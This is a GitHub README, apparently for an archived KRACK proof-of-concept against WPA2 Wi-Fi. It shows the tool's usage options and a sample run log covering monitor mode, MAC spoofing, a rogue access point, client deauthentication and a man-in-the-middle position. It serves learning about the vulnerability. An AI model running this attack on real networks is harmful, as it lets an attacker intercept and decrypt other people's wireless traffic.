Skip to content
This repository has been archived by the owner on May 4, 2022. It is now read-only.


Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

Latest commit


Git stats


Failed to load latest commit information.
Latest commit message
Commit time

[NO SUPPORT] PoC Krack (Key Reinstallation AttaCKs)

PLEASE READ : I have no intention to update or maintain this code. Feel free to use and modify it, but I won't answer to any comment/issue anymore. This project was difficult, I learnt what I wanted to learn, and developed what I wanted to develop, a quick-one-win to validate my comprehension of the vulnerability.

Proof of concept for Krack attack using channel-based MitM


French article on hackndo


WPA2 with CCMP


# ./ -h
usage: [-h] [-d] -a ACCESS_POINT -i IFACE_AP -b CLIENT -j
                IFACE_CLIENT -c CHANNEL

optional arguments:
  -h, --help            show this help message and exit
  -d, --direct          Skip channel and monitor settings
  -a ACCESS_POINT, --access_point ACCESS_POINT
                        Enter the SSID of the specific access point to target
  -i IFACE_AP, --iface_ap IFACE_AP
                        Enter the SSID of the specific access point to target
  -b CLIENT, --client CLIENT
                        Enter the MAC address of the specific client to target
  -j IFACE_CLIENT, --iface_client IFACE_CLIENT
                        Enter the SSID of the specific access point to target
  -c CHANNEL, --channel CHANNEL
                        Choose channel on which the targeted access point is
                        listening on

# ./ -a hackndo_ssid_test -i wlan1 -b "ab:cd:0a:0b:11:22" -j wlan0 -c 11
[*] Turning off both interfaces
[*] Setting interface wlan1 on channel 11
[*] Interface wlan1 is on channel 11
[*] Setting interface wlan0 on channel 4
[*] Interface wlan0 is on channel 4
[*] Starting monitor mode for wlan1
[*] Interface wlan1 is now in monitor mode
[*] Starting monitor mode for wlan0
[*] Interface wlan0 is now in monitor mode
[*] Turning on both interfaces
[*] Trying to find hackndo_ssid_test MAC address
[*] MAC Found ! 0e:cc:46:8a:b1:09
[*] Jammer initialized correctly
[*] Sniffing an AP Beacon...
[*] AP Beacon saved!
[*] Sniffing an AP Probe response...
[*] AP Probe response saved!
[*] Updating wlan1 MAC address to ab:cd:0a:0b:11:22 (Client MAC)
[*] wlan1 MAC address update successful
[*] Updating wlan0 MAC address to 0e:cc:46:8a:b1:09 (Real AP MAC)
[*] wlan0 MAC address update successful
[*] Rogue AP started. Sending beacons...
[*] Running main loop
[*] Starting deauth on AP 0e:cc:46:8a:b1:09 (hackndo_ssid_test) and client ab:cd:0a:0b:11:22...
[*] Probe request to our AP
[*] Client authenticated to our AP!
[*] MitM attack has started
[*] Deauth stopped


  • Use CSA (Channel Switch Announcement) to make client switch channel after deauth (See issue #1)
  • Save data sent by client
  • Break cryptography with known plain text when counter is reinitialized